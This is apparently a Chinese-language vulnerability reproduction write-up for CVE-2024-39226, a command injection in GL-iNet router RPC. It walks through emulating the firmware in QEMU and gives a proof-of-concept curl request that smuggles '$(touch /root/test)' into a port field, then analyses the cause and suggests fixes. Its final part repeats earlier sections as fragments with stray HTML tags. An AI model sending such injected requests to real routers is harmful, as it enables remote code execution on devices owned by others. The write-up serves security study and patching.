GL-iNet路由器CVE-2024-39226漏洞复现与分析<\/h1>

1. 漏洞概述<\/h2>
CVE-2024-39226是GL-iNet路由器中的一个RPC漏洞，存在于s2s.so模块中，允许通过精心构造的请求实现命令注入攻击。该漏洞特别危险，因为它可以通过网络接口触发，可能导致远程代码执行。<\/p>

2. 环境准备<\/h2>

2.1 固件获取与提取<\/h3>

下载GL-iNet AX1800固件：<\/p>

https:\/\/fw.gl-inet.cn\/firmware\/ax1800\/v4\/openwrt-ax1800-4.5.16-0321-1711030388.tar
<\/code><\/pre>
<\/li>

使用binwalk提取固件：<\/p>
binwalk -e openwrt-ax1800-4.5.16-0321-1711030388.tar
<\/span><\/span><\/code><\/pre><\/li>

确认文件架构为ARM架构<\/p>
<\/li>
<\/ol>
2.2 QEMU模拟环境搭建<\/h3>
2.2.1 下载预构建的QEMU镜像<\/h4>
从Debian Quick Image Baker获取armhf-virt镜像：<\/p>

内核文件：vmlinuz-3.2.0-4-vexpress<\/code><\/li>
RAM磁盘映像：initrd.img-3.2.0-4-vexpress<\/code><\/li>
虚拟磁盘映像：debian_wheezy_armhf_standard.qcow2<\/code><\/li>
<\/ul>
下载命令：<\/p>
wget https:\/\/people.debian.org\/~aurel32\/qemu\/armhf\/vmlinuz-3.2.0-4-vexpress
<\/span><\/span>wget https:\/\/people.debian.org\/~aurel32\/qemu\/armhf\/initrd.img-3.2.0-4-vexpress
<\/span><\/span>wget https:\/\/people.debian.org\/~aurel32\/qemu\/armhf\/debian_wheezy_armhf_standard.qcow2
<\/span><\/span><\/code><\/pre>2.2.2 解决常见问题<\/h4>


映像大小问题<\/strong>：<\/p>

QEMU要求SD卡大小必须是2的幂<\/li>
将映像大小调整为32GiB<\/li>
<\/ul>
<\/li>

挂载错误<\/strong>：<\/p>

确保正确挂载\/proc和\/dev文件系统<\/li>
这些挂载点提供了与内核和硬件设备交互的关键接口<\/li>
<\/ul>
<\/li>
<\/ol>
2.2.3 网络配置<\/h4>

在宿主机中搭建网卡，使QEMU和宿主机可以通信<\/li>
配置QEMU虚拟系统的路由<\/li>
使用net.sh脚本配置网络<\/li>
<\/ol>
3. 漏洞复现步骤<\/h2>
3.1 环境准备<\/h3>


将提取的squashfs-root文件夹上传到QEMU系统中：<\/p>
scp -r squashfs-root root@192.168.100.2:\/root\/
<\/span><\/span><\/code><\/pre><\/li>

挂载必要的文件系统：<\/p>
mount -t proc \/proc .\/proc
<\/span><\/span>mount -t devtmpfs \/dev .\/dev
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.2 服务配置<\/h3>


启动nginx服务：<\/p>
\/usr\/sbin\/nginx -c \/etc\/nginx\/nginx.conf -g 'daemon off;'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

解决常见问题：<\/p>

手动创建缺少的文件<\/li>
检查\/etc\/rc.d\/S80nginx和\/etc\/uci-defaults\/80_nginx-oui配置文件<\/li>
<\/ul>
<\/li>
<\/ol>
3.3 漏洞验证<\/h3>


使用披露的PoC进行验证：<\/p>
curl -H 'glinet: 1'<\/span> 127.0.0.1\/rpc -d '{"method":"call", "params":["", "s2s", "enable_echo_server", {"port": "7 $(touch \/root\/test)"}]}'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

检查命令是否执行成功：<\/p>
ls \/root\/test
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.4 问题排查<\/h3>


RPC报错<\/strong>：<\/p>

检查rpc.lua代码<\/li>
确保ubus服务正常运行<\/li>
启动ubusd服务：\/sbin\/ubusd<\/code><\/li>
<\/ul>
<\/li>

Nginx日志分析<\/strong>：<\/p>

检查\/etc\/nginx\/nginx.conf配置<\/li>
查看错误日志：\/var\/log\/nginx\/error.log<\/code><\/li>
常见错误：\/var\/run\/ngx-ubus-proxy.sock failed<\/code>或\/var\/run\/fcgiwrap.socket failed<\/code><\/li>
<\/ul>
<\/li>

服务启动<\/strong>：<\/p>

确保ubus和fcgiwrap服务同时启动<\/li>
<\/ul>
<\/li>
<\/ol>
4. 漏洞分析<\/h2>
4.1 漏洞原理<\/h3>

漏洞位于s2s.so模块中<\/li>
攻击者可以控制输入字符串(str)<\/li>
端口号(port)被限制为正数且小于65534<\/li>
但在字符串形式下，允许嵌入特殊字符如$()<\/code><\/li>
当包含类似7 $(touch \/root\/test)<\/code>的字符串时，shell会执行其中的命令<\/li>
<\/ol>
4.2 代码分析<\/h3>


RPC处理流程<\/strong>：<\/p>

创建会话管理<\/li>
如果ubus.call调用成功则返回会话信息<\/li>
失败则返回默认的本地会话(无会话信息)<\/li>
<\/ul>
<\/li>

关键限制<\/strong>：<\/p>

端口号必须为正整数且小于65534<\/li>
但字符串形式的端口号未进行充分过滤<\/li>
<\/ul>
<\/li>
<\/ol>
5. 修复建议<\/h2>

对端口号输入进行严格过滤，禁止特殊字符<\/li>
使用白名单方式验证输入<\/li>
更新到GL-iNet发布的最新固件版本<\/li>
<\/ol>
6. 参考文献<\/h2>

GL-iNet官方固件下载地址<\/li>
Debian Quick Image Baker文档<\/li>
QEMU官方文档<\/li>
OpenWRT相关技术文档<\/li>
<\/ol>

GL-iNet路由器CVE-2024-39226漏洞复现与分析<\/h1>

1. 漏洞概述<\/h2> CVE-2024-39226是GL-iNet路由器中的一个RPC漏洞，存在于s2s.so模块中，允许通过精心构造的请求实现命令注入攻击。该漏洞特别危险，因为它可以通过网络接口触发，可能导致远程代码执行。<\/p>

2. 环境准备<\/h2>

2.2 QEMU模拟环境搭建<\/h3>

3. 漏洞复现步骤<\/h2>

4. 漏洞分析<\/h2>

6. 参考文献<\/h2> GL-iNet官方固件下载地址<\/li> Debian Quick Image Baker文档<\/li> QEMU官方文档<\/li> OpenWRT相关技术文档<\/li> <\/ol>

1. 漏洞概述<\/h2>
CVE-2024-39226是GL-iNet路由器中的一个RPC漏洞，存在于s2s.so模块中，允许通过精心构造的请求实现命令注入攻击。该漏洞特别危险，因为它可以通过网络接口触发，可能导致远程代码执行。<\/p>

6. 参考文献<\/h2>

GL-iNet官方固件下载地址<\/li>
Debian Quick Image Baker文档<\/li>
QEMU官方文档<\/li>
OpenWRT相关技术文档<\/li> <\/ol>